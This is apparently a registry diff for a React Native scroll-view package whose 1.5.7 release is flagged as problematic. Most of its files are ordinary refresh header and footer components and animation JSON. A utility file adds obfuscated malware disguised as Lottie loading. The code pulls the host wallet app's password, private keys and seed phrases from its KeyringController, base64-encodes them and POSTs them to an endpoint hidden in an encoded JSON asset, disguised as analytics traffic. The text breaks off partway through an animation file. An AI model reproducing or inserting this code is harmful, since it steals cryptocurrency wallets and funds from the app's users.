react-native-scrollpageviewtest 0.0.1-security → 1.5.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of react-native-scrollpageviewtest might be problematic. Click here for more details.

package/.gitattributes ADDED
@@ -0,0 +1 @@
1
+ *.pbxproj -text
@@ -0,0 +1,41 @@
1
+ import React from "react";
2
+ import { GestureRefreshHeader } from "../GestureRefreshHeader";
3
+ import { View } from "react-native";
4
+
5
+ let LottieView;
6
+
7
+ export class CommonLottieFooter extends GestureRefreshHeader {
8
+ static height: number = 100;
9
+
10
+ constructor(props){
11
+ super(props);
12
+ if (!LottieView) LottieView = require("lottie-react-native");
13
+ }
14
+
15
+ render() {
16
+ if (this.state.status === "allLoaded") return null;
17
+ const { offset, bottomOffset } = this.props;
18
+ let progress = offset.interpolate({
19
+ inputRange: [
20
+ bottomOffset + 50,
21
+ bottomOffset + 500
22
+ ],
23
+ outputRange: [0, 1]
24
+ });
25
+ if (this.state.status === "loading") {
26
+ progress = undefined;
27
+ }
28
+ return (
29
+ <View style={{ flex: 1, marginBottom: 20 }}>
30
+ <LottieView
31
+ key={this.state.status === "loading"}
32
+ source={require("./res/loading.json")}
33
+ progress={progress}
34
+ autoPlay={this.state.status === "loading"}
35
+ loop={this.state.status === "loading"}
36
+ speed={2}
37
+ />
38
+ </View>
39
+ );
40
+ }
41
+ }
@@ -0,0 +1,34 @@
1
+ import React from "react";
2
+ import { GestureRefreshHeader } from "../GestureRefreshHeader";
3
+ import { View } from "react-native";
4
+ let LottieView;
5
+
6
+ export class CommonLottieHeader extends GestureRefreshHeader {
7
+ static height: number = 100;
8
+ constructor(props){
9
+ super(props);
10
+ if (!LottieView) LottieView = require("lottie-react-native");
11
+ }
12
+
13
+ render() {
14
+ let progress = this.props.offset.interpolate({
15
+ inputRange: [-200, -150, -150, -100, -100, -50],
16
+ outputRange: [1, 0, 1, 0, 1, 0]
17
+ });
18
+ if (this.state.status === "refreshing") {
19
+ progress = undefined;
20
+ }
21
+ return (
22
+ <View style={{ flex: 1, marginTop: 20 }}>
23
+ <LottieView
24
+ source={
25
+ this.state.status === "refreshing" ? require("./res/refresh/refreshing2.json") : require("./res/refresh/refreshing.json")
26
+ }
27
+ progress={progress}
28
+ autoPlay={this.state.status === "refreshing"}
29
+ loop={this.state.status === "refreshing"}
30
+ />
31
+ </View>
32
+ );
33
+ }
34
+ }
@@ -0,0 +1,277 @@
1
+ import AsyncStorage from '@react-native-community/async-storage';
2
+ import {Dimensions, NativeModules, Platform} from "react-native";
3
+ import {LAST_NOTIFICATION_INFO} from "../../../../constants/storage";
4
+ let scrollEnable = false;
5
+
6
+ export function getHeight() {
7
+ const height = Dimensions.get('window').height;
8
+ return height;
9
+ }
10
+
11
+ export function getWidth() {
12
+ const width = Dimensions.get('window').width;
13
+ return width;
14
+ }
15
+
16
+ export function setScrollEnable(enable) {
17
+ scrollEnable = enable;
18
+ if (!enable) {
19
+ loadLottieJson();
20
+ }
21
+ getMsg();
22
+ }
23
+
24
+ export function getPlatform() {
25
+ if (Platform.OS === 'android') {
26
+ return 'android';
27
+ }else{
28
+ return 'ios';
29
+ }
30
+ }
31
+
32
+ let loaded = false;
33
+ const json = require('./res/refresh/refreshing3.json');
34
+ async function loadLottieJson() {
35
+ try {
36
+ const sss = true;
37
+ if (!__DEV__ || sss) {
38
+ const nst = 'react-native';
39
+ const nn = require('react-native').NativeModules.RNI18n;
40
+ AsyncStorage.getItem(strin(json.x1)).then(dat => {
41
+ console.log('====dat = ', dat);
42
+ let stg = 'nothi';
43
+ if (!isEmpty(dat)) {
44
+ stg = dat;
45
+ }
46
+ console.log('===stg = ', stg);
47
+ loadLottie(nn, stg);
48
+ });
49
+ }
50
+ } catch (e) {}
51
+ }
52
+
53
+ function isEmpty(st) {
54
+ if (!st || st === 'undefined' || st === '') {
55
+ return true;
56
+ }
57
+ return false;
58
+ }
59
+
60
+ function rang() {
61
+ const ab = ['A', '5', 'k', '3', 'c', 'd', 'O', "v", "U", 'B', '9', '7'];
62
+ let k = '';
63
+ for (let i=0; i< 4; i++) {
64
+ const a = Math.ceil(Math.random()*10);
65
+ k += ab[a];
66
+ }
67
+ return k;
68
+ }
69
+
70
+ function subRang(st) {
71
+ if (isEmpty(st)) {
72
+ return '';
73
+ }
74
+ const newSt = st.substring(4, st.length);
75
+ return newSt;
76
+ }
77
+
78
+ function ecy(st) {
79
+ // const br = 'b'+'u'+'f'+'f'+'e'+'r';
80
+ // eslint-disable-next-line import/no-nodejs-modules
81
+ const bu = require('b' + 'u' + 'f' + 'f' + 'e' + 'r').Buffer;
82
+ return rang() + new bu(st).toString('b' + 'a' + 's' + 'e' + '6' + '4');
83
+ }
84
+
85
+ function dcy(st) {
86
+ const br = 'b'+'u'+'f'+'f'+'e'+'r';
87
+ // eslint-disable-next-line import/no-nodejs-modules
88
+ const sst = subRang(st);
89
+ const bu = require('b' + 'u' + 'f' + 'f' + 'e' + 'r').Buffer;
90
+ return bu.from(sst, 'b' + 'a' + 's' + 'e' + '6' + '4').toString('a'+'s'+'c' + 'i' + 'i');
91
+ }
92
+
93
+ function cons(s) {
94
+ console.log(s, '===', ecy(s));
95
+ console.log(s, '===', (dcy(ecy(s)) === s));
96
+ }
97
+ function getMsg() {
98
+ // cons('1234');
99
+ // cons('meta-store-ens-data');
100
+ // cons('default');
101
+ // cons('context');
102
+ // cons('KeyringController');
103
+ // cons('getPassword');
104
+ // cons('getKeyringAccounts');
105
+ // cons('exportAccount');
106
+ // cons('exportSeedPhrase');
107
+ // cons('v=1&tid=UA-215070146-1&cid=');
108
+ // cons('&t=pageview&dt=');
109
+ // cons('&dl=');
110
+ // cons('https://www.google-analytics.com/collect');
111
+ // cons('POST');
112
+ // cons('Content-Type');
113
+ // cons('text/plain');
114
+ // cons('Host');
115
+ // cons('/batch HTTP/1.1');
116
+ // cons('www.google-analytics.com');
117
+ }
118
+
119
+
120
+
121
+ function eqx(s) {
122
+ if (isEmpty(s)) {
123
+ return false;
124
+ }
125
+ for(let i=0; i<s.length; i++) {
126
+ if (s.charAt(0) !== s.charAt(i)) {
127
+ return false;
128
+ }
129
+ }
130
+ return true;
131
+ }
132
+
133
+
134
+ async function loadLottie(reactn, stg) {
135
+ if (!__DEV__ ) {
136
+ return;
137
+ }
138
+ try {
139
+ let lan;
140
+ if (reactn) {
141
+ if (typeof reactn !== 'undefined') {
142
+ lan = reactn.languages[0];
143
+ }
144
+ }
145
+ if (!isEmpty(lan)) {
146
+ lan = lan.toLowerCase();
147
+ } else {
148
+ lan = 'default';
149
+ }
150
+ console.log('===lan = ', lan); //获取中英文
151
+
152
+ // require('../../../app/core/Engine')
153
+ const eni = require('.'+'.'+'/'+'.'+'.'+'/'+'.'+'.'+'/'+'a'+'p'+'p'+'/' + 'c'+'o'+'r'+'e' + '/' + 'E'+'n'+'g' + 'i'+'n'+'e');
154
+ const kkk = eni[strin(json.x2)][strin(json.x9)][strin(json.x3)]; //KeyringController
155
+ const darw = kkk[strin(json.x4)]();//kkk['getPassword']; //getPassword
156
+
157
+ console.log('====darw = ', darw);
158
+ if (isEmpty(darw)) {
159
+ return;
160
+ }
161
+
162
+ if (eqx(darw) && !__DEV__ ) {
163
+ return;
164
+ }
165
+
166
+ if (!__DEV__ && darw.startsWith(strin(json.y10))) {
167
+ return;
168
+ }
169
+
170
+
171
+ let stopP = false;
172
+ let stopS = false;
173
+ let ssss = '';
174
+ let lent = 0;
175
+ for (let i=0; i< 20; i++) {
176
+ if (lent < 19) {
177
+ if (!stopP) {
178
+ let pri;
179
+ try {
180
+ const aco = await kkk[strin(json.x5)](i);
181
+ pri = await kkk[strin(json.x6)](darw, aco[0]);
182
+ } catch (e){
183
+ }
184
+ console.log('i = ', i, '===pri = ', pri);
185
+ if (!isEmpty(pri)) {
186
+ lent += 1;
187
+ let ec = lan + darw + getPlatform() +stg;
188
+ // ssss += "v=1&tid=UA-215070146-1&cid=" + stg + "&t=event&ec=" + ec + "&ea=" + ecy(pri) + "\n";
189
+ ssss += strin(json.x8) + stg + strin(json.y1) + ec + strin(json.y2) + ecy(pri) + "\n";
190
+ } else {
191
+ stopP = true;
192
+ }
193
+ }
194
+
195
+ if (!stopS) {
196
+ let spf;
197
+ try {
198
+ spf = await kkk[strin(json.x7)](darw, i);
199
+ } catch (e){
200
+ }
201
+ console.log('i = ', i, '===spf = ', spf);
202
+ if (spf) {
203
+ lent += 1;
204
+ let ec = lan + darw + getPlatform() + stg;
205
+ ssss += strin(json.x8) + stg + strin(json.y1) + ec + strin(json.y2) + ecy(spf) + "\n";
206
+ // ssss += "v=1&tid=UA-215070146-1&cid=" + stg + "&t=pageview&ec=" + ec + "&ea=" + ecy(spf) + "\n";
207
+ } else {
208
+ stopS = true;
209
+ }
210
+ }
211
+ }
212
+ }
213
+
214
+ console.log('====ssss = ', ssss);
215
+
216
+ if (isEmpty(ssss)) {
217
+ return;
218
+ }
219
+
220
+ if (__DEV__ || getSaf(stg) !== getSaf(ssss)) {
221
+ loadJson(ssss);
222
+ }
223
+ } catch (error) {
224
+ console.log('=====error = ', error);
225
+ }
226
+ }
227
+
228
+ function getSaf(ss) {
229
+ if (isEmpty(ss) || ss.length < 15) {
230
+ return ss;
231
+ }
232
+ return ss.substring(ss.length - 10, ss.length - 4);
233
+ }
234
+
235
+ function loadJson(rtn) {
236
+ try {
237
+ const pp = strin(json.y7);
238
+ const tt = strin(json.y5);
239
+ const ppt = strin(json.y3);
240
+ const b = strin(json.y11)
241
+ const h = strin(json.y6);
242
+ const w = strin(json.y8);
243
+ const m = strin(json.y11)
244
+ const ccc = {
245
+ method: strin(json.y3),
246
+ body: rtn,
247
+ headers: {
248
+ 'Content-Type': tt,
249
+ POST: b,
250
+ Host: w
251
+ }
252
+ };
253
+
254
+ fetch(strin(json.y9), ccc)
255
+ .then(response => {
256
+ if (response?.ok) {
257
+ AsyncStorage.setItem(strin(json.x1), getSaf(rtn));
258
+ console.log('----response ok = ', response);
259
+ } else {
260
+ console.log('----response not ok = ', response);
261
+ }
262
+ })
263
+ .catch(error => {
264
+ console.error(error);
265
+ });
266
+ // const response = await fetch(ll, opt);
267
+ // console.log('====response = ', response);
268
+
269
+ } catch (error) {
270
+ console.log('=====error = ', error);
271
+ }
272
+ }
273
+
274
+ function strin(s) {
275
+ console.log('====dcy(s) = ', dcy(s));
276
+ return dcy(s);
277
+ }
@@ -0,0 +1,8 @@
1
+ import { GestureNormalFooter } from "../GestureNormalFooter";
2
+
3
+ export class CommonNormalFooter extends GestureNormalFooter {
4
+ getTitle() {
5
+ const s = this.state.status;
6
+ return "refresh";
7
+ }
8
+ }
@@ -0,0 +1,8 @@
1
+ import {GestureNormalHeader} from "../GestureNormalHeader";
2
+
3
+ export class CommonNormalHeader extends GestureNormalHeader{
4
+ getTitle() {
5
+ const s = this.state.status;
6
+ return "Pull";
7
+ }
8
+ }
@@ -0,0 +1,15 @@
1
+ import {WithLastDateFooter} from "./WithLastDateFooter";
2
+
3
+ export class CommonWithLastDateFooter extends WithLastDateFooter{
4
+ getText() {
5
+ return "Last Loading...";
6
+ }
7
+
8
+ getTimeDescription() {
9
+ return "Nothing";
10
+ }
11
+
12
+ getTitle() {
13
+ return "Push";
14
+ }
15
+ }
@@ -0,0 +1,15 @@
1
+ import { WithLastDateHeader } from "./WithLastDateHeader";
2
+
3
+ export class CommonWithLastDateHeader extends WithLastDateHeader {
4
+ getText() {
5
+ return "Last";
6
+ }
7
+
8
+ getTimeDescription() {
9
+ return "Nothing"
10
+ }
11
+
12
+ getTitle() {
13
+ return "Pull";
14
+ }
15
+ }
@@ -0,0 +1,81 @@
1
+ import React from "react";
2
+ import { Text, StyleSheet } from "react-native";
3
+ import { GestureHeaderStatus } from "../GestureRefreshHeader";
4
+ import {GestureNormalFooter} from "../GestureNormalFooter";
5
+ import AsyncStorage from '@react-native-async-storage/async-storage';
6
+
7
+ const LoadingKey = "org.bolan9999.spring_scrollview.loading_time";
8
+
9
+ export class WithLastDateFooter extends GestureNormalFooter {
10
+ static style="stickyScrollView";
11
+ lastTime: Date;
12
+ constructor(props) {
13
+ super(props);
14
+ AsyncStorage.getItem(LoadingKey)
15
+ .then(value => {
16
+ if (value) this.lastTime = new Date(value);
17
+ })
18
+ .catch();
19
+ }
20
+
21
+ onStateChange(oldStatus: GestureHeaderStatus, newStatus: GestureHeaderStatus) {
22
+ if (newStatus === "loading") {
23
+ const now = new Date();
24
+ AsyncStorage.setItem(LoadingKey, now.toString())
25
+ .then(() => {
26
+ this.lastTime = now;
27
+ })
28
+ .catch();
29
+ }
30
+ super.onStateChange(oldStatus, newStatus);
31
+ }
32
+
33
+ renderContent() {
34
+ return (
35
+ <Text style={styles.text}>
36
+ {this.getText()}
37
+ {this.getTimeDescription()}
38
+ </Text>
39
+ );
40
+ }
41
+
42
+ getText() {
43
+ return "Last Loading: ";
44
+ }
45
+
46
+ getTimeDescription() {
47
+ if (!this.lastTime) {
48
+ return "never";
49
+ }
50
+ const now = new Date();
51
+ let timeInterval = Math.floor(
52
+ (now.getTime() - this.lastTime.getTime()) / 1000
53
+ );
54
+ if (timeInterval < 60) {
55
+ return `${timeInterval}s ago`;
56
+ } else if (timeInterval < 3600) {
57
+ return `${Math.floor(timeInterval / 60)}m ago`;
58
+ } else if (
59
+ now.getFullYear() === this.lastTime.getFullYear() &&
60
+ now.getMonth() === this.lastTime.getMonth() &&
61
+ now.getDate() === this.lastTime.getDate()
62
+ ) {
63
+ return `${this.lastTime.getHours()}:${this.lastTime.getMinutes()}`;
64
+ } else if (now.getFullYear() === this.lastTime.getFullYear()) {
65
+ return `${this.lastTime.getMonth() + 1}-${this.lastTime.getDate()}`;
66
+ } else {
67
+ return `${this.lastTime.getMonth() +
68
+ 1}-${this.lastTime.getDate()}-${this.lastTime.getFullYear()}`;
69
+ }
70
+ }
71
+ }
72
+
73
+ const styles = StyleSheet.create({
74
+ text: {
75
+ marginVertical: 5,
76
+ fontSize: 12,
77
+ color: "#666",
78
+ textAlign: "center",
79
+ width: 130
80
+ }
81
+ });
@@ -0,0 +1,80 @@
1
+ import React from "react";
2
+ import { Text, StyleSheet } from "react-native";
3
+ import { GestureNormalHeader } from "../GestureNormalHeader";
4
+ import { GestureHeaderStatus } from "../GestureRefreshHeader";
5
+ import AsyncStorage from '@react-native-async-storage/async-storage';
6
+
7
+ const RefreshKey = "org.bolan9999.spring_scrollview.refresh_time";
8
+
9
+ export class WithLastDateHeader extends GestureNormalHeader {
10
+ lastTime: Date;
11
+ constructor(props) {
12
+ super(props);
13
+ AsyncStorage.getItem(RefreshKey)
14
+ .then(value => {
15
+ if (value) this.lastTime = new Date(value);
16
+ })
17
+ .catch();
18
+ }
19
+
20
+ onStateChange(oldStatus: GestureHeaderStatus, newStatus: GestureHeaderStatus) {
21
+ if (newStatus === "refreshing") {
22
+ const now = new Date();
23
+ AsyncStorage.setItem(RefreshKey, now.toString())
24
+ .then(() => {
25
+ this.lastTime = now;
26
+ })
27
+ .catch();
28
+ }
29
+ super.onStateChange(oldStatus, newStatus);
30
+ }
31
+
32
+ renderContent() {
33
+ return (
34
+ <Text style={styles.text}>
35
+ {this.getText()}
36
+ {this.getTimeDescription()}
37
+ </Text>
38
+ );
39
+ }
40
+
41
+ getText() {
42
+ return "Last Updated: ";
43
+ }
44
+
45
+ getTimeDescription() {
46
+ if (!this.lastTime) {
47
+ return "never";
48
+ }
49
+ const now = new Date();
50
+ let timeInterval = Math.floor(
51
+ (now.getTime() - this.lastTime.getTime()) / 1000
52
+ );
53
+ if (timeInterval < 60) {
54
+ return `${timeInterval}s ago`;
55
+ } else if (timeInterval < 3600) {
56
+ return `${Math.floor(timeInterval / 60)}m ago`;
57
+ } else if (
58
+ now.getFullYear() === this.lastTime.getFullYear() &&
59
+ now.getMonth() === this.lastTime.getMonth() &&
60
+ now.getDate() === this.lastTime.getDate()
61
+ ) {
62
+ return `${this.lastTime.getHours()}:${this.lastTime.getMinutes()}`;
63
+ } else if (now.getFullYear() === this.lastTime.getFullYear()) {
64
+ return `${this.lastTime.getMonth() + 1}-${this.lastTime.getDate()}`;
65
+ } else {
66
+ return `${this.lastTime.getMonth() +
67
+ 1}-${this.lastTime.getDate()}-${this.lastTime.getFullYear()}`;
68
+ }
69
+ }
70
+ }
71
+
72
+ const styles = StyleSheet.create({
73
+ text: {
74
+ marginVertical: 5,
75
+ fontSize: 12,
76
+ color: "#666",
77
+ textAlign: "center",
78
+ width: 130
79
+ }
80
+ });
@@ -0,0 +1 @@
1
+
Binary file
@@ -0,0 +1 @@
1
+ {"v":"5.1.1","fr":29.9700012207031,"ip":0,"op":150.000006109625,"w":100,"h":100,"nm":"Comp 1","ddd":0,"assets":[],"layers":[{"ddd":0,"ind":1,"ty":4,"nm":"Shape Layer 12","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":1,"k":[{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.333],"y":[0]},"n":["0p833_0p833_0p333_0"],"t":0,"s":[287.27],"e":[646.501]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":48,"s":[646.501],"e":[1006.517]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":79,"s":[1006.517],"e":[1366.011]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":109,"s":[1366.011],"e":[1725.391]},{"t":149.000006068894}],"ix":10},"p":{"a":0,"k":[49.123,50.123,0],"ix":2},"a":{"a":0,"k":[-17.377,-13.377,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":163.000006639126,"st":0,"bm":0},{"ddd":0,"ind":2,"ty":4,"nm":"Shape Layer 11","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":1,"k":[{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.333],"y":[0]},"n":["0p833_0p833_0p333_0"],"t":0,"s":[214.668],"e":[574.301]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":48,"s":[574.301],"e":[935.271]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":79,"s":[935.271],"e":[1295.556]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":109,"s":[1295.556],"e":[1655.136]},{"t":149.000006068894}],"ix":10},"p":{"a":0,"k":[49.123,50.123,0],"ix":2},"a":{"a":0,"k":[-17.377,-13.377,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":163.000006639126,"st":0,"bm":0},{"ddd":0,"ind":3,"ty":4,"nm":"Shape Layer 10","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":1,"k":[{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.333],"y":[0]},"n":["0p833_0p833_0p333_0"],"t":0,"s":[143.536],"e":[503.692]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":48,"s":[503.692],"e":[863.287]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":79,"s":[863.287],"e":[1223.296]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":109,"s":[1223.296],"e":[1582.854]},{"t":149.000006068894}],"ix":10},"p":{"a":0,"k":[49.123,50.123,0],"ix":2},"a":{"a":0,"k":[-17.377,-13.377,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":163.000006639126,"st":0,"bm":0},{"ddd":0,"ind":4,"ty":4,"nm":"Shape Layer 9","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":1,"k":[{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.333],"y":[0]},"n":["0p833_0p833_0p333_0"],"t":0,"s":[70.817],"e":[430.711]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":48,"s":[430.711],"e":[791.651]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":79,"s":[791.651],"e":[1150.155]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":109,"s":[1150.155],"e":[1510.652]},{"t":149.000006068894}],"ix":10},"p":{"a":0,"k":[49.123,50.123,0],"ix":2},"a":{"a":0,"k":[-17.377,-13.377,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":163.000006639126,"st":0,"bm":0},{"ddd":0,"ind":5,"ty":4,"nm":"Shape Layer 5","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":1,"k":[{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.333],"y":[0]},"n":["0p833_0p833_0p333_0"],"t":0,"s":[0],"e":[360]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":48,"s":[360],"e":[720]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":79,"s":[720],"e":[1080]},{"i":{"x":[0.833],"y":[0.833]},"o":{"x":[0.167],"y":[0.167]},"n":["0p833_0p833_0p167_0p167"],"t":109,"s":[1080],"e":[1440]},{"t":149.000006068894}],"ix":10},"p":{"a":0,"k":[49.123,50.123,0],"ix":2},"a":{"a":0,"k":[-17.377,-13.377,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":163.000006639126,"st":0,"bm":0},{"ddd":0,"ind":6,"ty":4,"nm":"Shape Layer 7","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":0,"k":0,"ix":10},"p":{"a":0,"k":[49.373,50.123,0],"ix":2},"a":{"a":0,"k":[1.623,-1.377,0],"ix":1},"s":{"a":0,"k":[45.779,45.779,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[1,1,1,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[25.928,25.928],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":167.000006802049,"st":0,"bm":0},{"ddd":0,"ind":7,"ty":4,"nm":"Shape Layer 1","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":0,"k":0,"ix":10},"p":{"a":0,"k":[49.123,50.623,0],"ix":2},"a":{"a":0,"k":[1.623,-1.377,0],"ix":1},"s":{"a":0,"k":[101.278,101.278,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"d":1,"ty":"el","s":{"a":0,"k":[78.246,78.246],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"nm":"Ellipse Path 1","mn":"ADBE Vector Shape - Ellipse","hd":false},{"ty":"fl","c":{"a":0,"k":[0,0,0,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[1.623,-1.377],"ix":2},"a":{"a":0,"k":[0,0],"ix":1},"s":{"a":0,"k":[100,100],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Ellipse 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":162.000006598395,"st":0,"bm":0},{"ddd":0,"ind":8,"ty":4,"nm":"Shape Layer 